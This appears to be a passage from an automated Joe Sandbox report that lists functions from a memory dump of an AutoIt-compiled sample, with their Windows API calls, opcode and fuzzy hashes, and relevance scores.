Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 4a5b3e8d77b1daa76e11f2d9ca1805dd6d3c78d694b231ead166e31a6209fe31
Instruction ID: a35faf04b5289d1c3c68baa43b7af47922bb5caa045c3e7c094c6c0273ebc289
Opcode Fuzzy Hash: 4a5b3e8d77b1daa76e11f2d9ca1805dd6d3c78d694b231ead166e31a6209fe31
Instruction Fuzzy Hash: 02515CB5A00209DFCB14DF58D884AAAB7B9FF4C314B15856AFD59DB301E335EA11CBA0

Function 001E220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001E2258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001E22A3
IsMenu.USER32(00000000), ref: 001E22C3
CreatePopupMenu.USER32 ref: 001E22F7
GetMenuItemCount.USER32(000000FF), ref: 001E2355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 001E2386

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 124e20fa4dd6723890adae3072f05c5987de947b8fafdb01fd8cfe593a955a21
Instruction ID: 922f0afe0203f2cad4917923d030d2f773bc356f121cdf68564ffd0890e363d3
Opcode Fuzzy Hash: 124e20fa4dd6723890adae3072f05c5987de947b8fafdb01fd8cfe593a955a21
Instruction Fuzzy Hash: 1451E070A00B8ADFCF24CF6AD9A8BAEBBF9BF19314F144129E81597291D3748904CF51

Function 00181765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0018179A
GetWindowRect.USER32(?,?), ref: 001817FE
ScreenToClient.USER32(?,?), ref: 0018181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0018182C
EndPaint.USER32(?,?), ref: 00181876

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 0a87f08655083cd38fb25952fb4d2d7a699e34d7eabe7b3a09003eaec7c0023f
Instruction ID: 6456badac236432bdec3e96bbfdd48ed92c74c61a9186afb5d95e11ecf34ba2f
Opcode Fuzzy Hash: 0a87f08655083cd38fb25952fb4d2d7a699e34d7eabe7b3a09003eaec7c0023f
Instruction Fuzzy Hash: D741BE31104710AFC720EF24DCC9FAA7BECEB4A724F140628F9A4861A2CB319946DF61

Function 0020B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(002457B0,00000000,011352C8,?,?,002457B0,?,0020B5A8,?,?), ref: 0020B712
EnableWindow.USER32(00000000,00000000), ref: 0020B736
ShowWindow.USER32(002457B0,00000000,011352C8,?,?,002457B0,?,0020B5A8,?,?), ref: 0020B796
ShowWindow.USER32(00000000,00000004,?,0020B5A8,?,?), ref: 0020B7A8
EnableWindow.USER32(00000000,00000001), ref: 0020B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0020B7EF

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 570dc46df7f6d03ec006062897e8ed946f887adc6df767b8e69ed1ada3a90cc3
Instruction ID: 98fe52dae0668c95ed9d17d02927926b66bba743fa36aa94ca53c111b6e2c96c
Opcode Fuzzy Hash: 570dc46df7f6d03ec006062897e8ed946f887adc6df767b8e69ed1ada3a90cc3
Instruction Fuzzy Hash: F5415935640341AFDB33CF28C599B94BBA0FB45710F1841A9E9489F6F3C731A866CB51

Function 001F709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,001F4E41,?,?,00000000,00000001), ref: 001F70AC

Part of subcall function 001F39A0: GetWindowRect.USER32(?,?), ref: 001F39B3

GetDesktopWindow.USER32 ref: 001F70D6
GetWindowRect.USER32(00000000), ref: 001F70DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 001F710F

Part of subcall function 001E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001E52BC

GetCursorPos.USER32(?), ref: 001F713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001F7199

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: b1399e6f3881f9d6dc31aa636f6768c7d34e2d71745f79854b5c4a5806308e41
Instruction ID: 7861e11426538b073da8954cf6ef60f53b30e70277256b8bce0b50ead8a82a87
Opcode Fuzzy Hash: b1399e6f3881f9d6dc31aa636f6768c7d34e2d71745f79854b5c4a5806308e41
Instruction Fuzzy Hash: E131C672509309ABD720DF14DC49F5BBBEAFF88314F000519F59597191CB71EA09CB92

Function 001D8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001D80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001D80C0
Part of subcall function 001D80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001D80CA
Part of subcall function 001D80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001D80D9
Part of subcall function 001D80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001D80E0
Part of subcall function 001D80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001D80F6

GetLengthSid.ADVAPI32(?,00000000,001D842F), ref: 001D88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 001D88D6
HeapAlloc.KERNEL32(00000000), ref: 001D88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 001D88F6
GetProcessHeap.KERNEL32(00000000,00000000,001D842F), ref: 001D890A
HeapFree.KERNEL32(00000000), ref: 001D8911

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 25de7f6ff0246861485afa6f919edbf6b671e1ad1ddeae36b1d7410d74ed0da3
Instruction ID: d049b8377c195be1de4f2e6f2f0bdbb039666e59ac5186ff42b8958f8d0b79a2
Opcode Fuzzy Hash: 25de7f6ff0246861485afa6f919edbf6b671e1ad1ddeae36b1d7410d74ed0da3
Instruction Fuzzy Hash: 6611B171541309FFDB249FA4DD19BBEB779EB84316F10412AF88597211CB32AD01DB60

Function 001D85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001D85E2
OpenProcessToken.ADVAPI32(00000000), ref: 001D85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 001D85F8
CloseHandle.KERNEL32(00000004), ref: 001D8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001D8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 001D8646

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 1f019029abb120cbab6de34773fa4f73ef58e7ec2f50f1aa0c6aa1d9413c0f67
Instruction ID: 2f1c5e5c7dd5be26777cd59a2fae592e8f8fc6feb005132c33fa31e7ccce2b36
Opcode Fuzzy Hash: 1f019029abb120cbab6de34773fa4f73ef58e7ec2f50f1aa0c6aa1d9413c0f67
Instruction Fuzzy Hash: AF116AB254024DABDF118FA8ED49FEE7BA9EF08714F044065FE04A2261C772DD61EB61

Function 001DB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 001DB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 001DB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 001DB7CD
ReleaseDC.USER32(00000000,00000000), ref: 001DB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 001DB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 001DB7FE

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: fd4b8a78808cdfa5a983bfe8a58247904c3e88c7f26f49492091bb89f932467c
Instruction ID: aa9345e91c14a2cbead9411a596a132fc9995167f3af0a72359df2553e9b09ae
Opcode Fuzzy Hash: fd4b8a78808cdfa5a983bfe8a58247904c3e88c7f26f49492091bb89f932467c
Instruction Fuzzy Hash: 8D018475E40309BBEB509BE69D49A5EBFB8EB48311F004076FA08A7391D7319C00CF90

Function 001A0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 001A0193
MapVirtualKeyW.USER32(00000010,00000000), ref: 001A019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 001A01A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 001A01B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 001A01B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 001A01C1

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: df89cc157cbdd1c200528a9c2cb662166effacd5244c94e04a288095790e1bad
Instruction ID: f151f029ee5215b9018eef831500f7cbe61ba8e3a83edd18bd9c24321523ad57
Opcode Fuzzy Hash: df89cc157cbdd1c200528a9c2cb662166effacd5244c94e04a288095790e1bad
Instruction Fuzzy Hash: EA016CB09417597DE3008F5A8C85B52FFA8FF19354F00411BA15C47942C7F5A864CFE5

Function 001E53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001E53F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001E540F
GetWindowThreadProcessId.USER32(?,?), ref: 001E541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001E542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001E5437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001E543E

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 48a8415b35a77aacd529ca45a7da89f7b3fed3679c984f72a826d0004f363168
Instruction ID: 332cfb005962d973f11322748e02771637f9cad450ea33fb16d4e29400ae284b
Opcode Fuzzy Hash: 48a8415b35a77aacd529ca45a7da89f7b3fed3679c984f72a826d0004f363168
Instruction Fuzzy Hash: 84F03631181658BBD7715B52ED0DEEF7F7CEFC6B11F000169F914D1452D7A11A0186B5

Function 001E7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 001E7243
EnterCriticalSection.KERNEL32(?,?,00190EE4,?,?), ref: 001E7254
TerminateThread.KERNEL32(00000000,000001F6,?,00190EE4,?,?), ref: 001E7261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00190EE4,?,?), ref: 001E726E

Part of subcall function 001E6C35: CloseHandle.KERNEL32(00000000,?,001E727B,?,00190EE4,?,?), ref: 001E6C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 001E7281
LeaveCriticalSection.KERNEL32(?,?,00190EE4,?,?), ref: 001E7288

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 07239221868e2581b2d0834b527bdc89bb67fb54cf0ee9c8b1ddf8a0a6b07709
Instruction ID: e4b202bf4c3ef7b2c6a465107c31ea09e44c674d36625564d6e33415c78d7bfd
Opcode Fuzzy Hash: 07239221868e2581b2d0834b527bdc89bb67fb54cf0ee9c8b1ddf8a0a6b07709
Instruction Fuzzy Hash: 77F05E36580712EFE7A12B64FE4C9DEB729EF45702B500531FA03914A2CB765801CB50

Function 001D8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D899D
UnloadUserProfile.USERENV(?,?), ref: 001D89A9
CloseHandle.KERNEL32(?), ref: 001D89B2
CloseHandle.KERNEL32(?), ref: 001D89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 001D89C3
HeapFree.KERNEL32(00000000), ref: 001D89CA

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 6fc10c4ab5bbe979cc175007bbfec08c42580857f694b17781b6a768b22fa165
Instruction ID: 2d433bd2b497b59436208efc3ee6050957629c98176ca43449e390c8d4e0c459
Opcode Fuzzy Hash: 6fc10c4ab5bbe979cc175007bbfec08c42580857f694b17781b6a768b22fa165
Instruction Fuzzy Hash: 54E0C236084201FBDA515FE1FE0C90AFB79FB89722B108230F21981871CB329460DB90

Function 001D7530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00212C7C,?), ref: 001D76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00212C7C,?), ref: 001D7702
CLSIDFromProgID.OLE32(?,?,00000000,0020FB80,000000FF,?,00000000,00000800,00000000,?,00212C7C,?), ref: 001D7727
_memcmp.LIBCMT ref: 001D7748

Strings

,,!, xrefs: 001D753D

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,!
API String ID: 314563124-3142458726
Opcode ID: 8ad9a53a4ada5ccc6e74f6f7a4643a554a8862a95c3266f6587eaf98e1aa995b
Instruction ID: 44d77ada2a2a0e9a9045c3f7ba7416d126226b11950dcf92e46a5240a0703eac
Opcode Fuzzy Hash: 8ad9a53a4ada5ccc6e74f6f7a4643a554a8862a95c3266f6587eaf98e1aa995b
Instruction Fuzzy Hash: CF811D75A00109EFCB04DFA4C988DEEB7B9FF89315F204559F515AB290EB71AE06CB60

Function 001F85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001F8613
CharUpperBuffW.USER32(?,?), ref: 001F8722
VariantClear.OLEAUT32(?), ref: 001F889A

Part of subcall function 001E7562: VariantInit.OLEAUT32(00000000), ref: 001E75A2
Part of subcall function 001E7562: VariantCopy.OLEAUT32(00000000,?), ref: 001E75AB
Part of subcall function 001E7562: VariantClear.OLEAUT32(00000000), ref: 001E75B7

Strings

Incorrect Parameter format, xrefs: 001F864B, 001F880D
AUTOIT.ERROR, xrefs: 001F8728

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 91d032313041ef80464f75ecf4546c693048d404d8e5bc9096c9600d0a6e6888
Instruction ID: 31dca0f886809718125951d929739fd0fc8f8effcd0eb833d652b65d58e23898
Opcode Fuzzy Hash: 91d032313041ef80464f75ecf4546c693048d404d8e5bc9096c9600d0a6e6888
Instruction Fuzzy Hash: 0191AE746083059FC714EF24C48496ABBE4EF99754F14892EF98ACB361DB30E905CB92

Function 001E2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0019FC86: _wcscpy.LIBCMT ref: 0019FCA9

_memset.LIBCMT ref: 001E2B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001E2BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001E2C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 001E2C97

Strings

0, xrefs: 001E2B73

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 5ac2068b4b2a765eeee096dd545ab70837c4d9d78f8d0e20ad2e3413d8653de5
Instruction ID: d8daa108e793d8880859fabfa8bad127a31bd985981fee5ba359170503c18342
Opcode Fuzzy Hash: 5ac2068b4b2a765eeee096dd545ab70837c4d9d78f8d0e20ad2e3413d8653de5
Instruction Fuzzy Hash: D251CD71208B809BD7299E2AD855A6FB7E8EF9A310F240A2DF895D3191DB70CD44CB52

Function 001E2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001E27C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 001E27DC
DeleteMenu.USER32(?,00000007,00000000), ref: 001E2822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00245890,00000000), ref: 001E286B

Strings

0, xrefs: 001E27B5

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: e9fc50e657f473ce7f677776f620a9b2c2a9ef256b67b4a685b1b763f556f6b1
Instruction ID: 4e9f15f2d9063abee28de0d48cbcc0347f3e00f773e97f816023de08831b02bf
Opcode Fuzzy Hash: e9fc50e657f473ce7f677776f620a9b2c2a9ef256b67b4a685b1b763f556f6b1
Instruction Fuzzy Hash: 7A418C702047819FD724DF26C854F1ABBE8AF95324F144A6DF8A697292D730A905CB52

Function 001FD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 001FD7C5

Part of subcall function 0018784B: _memmove.LIBCMT ref: 00187899

Strings

winapi, xrefs: 001FD836
stdcall, xrefs: 001FD847
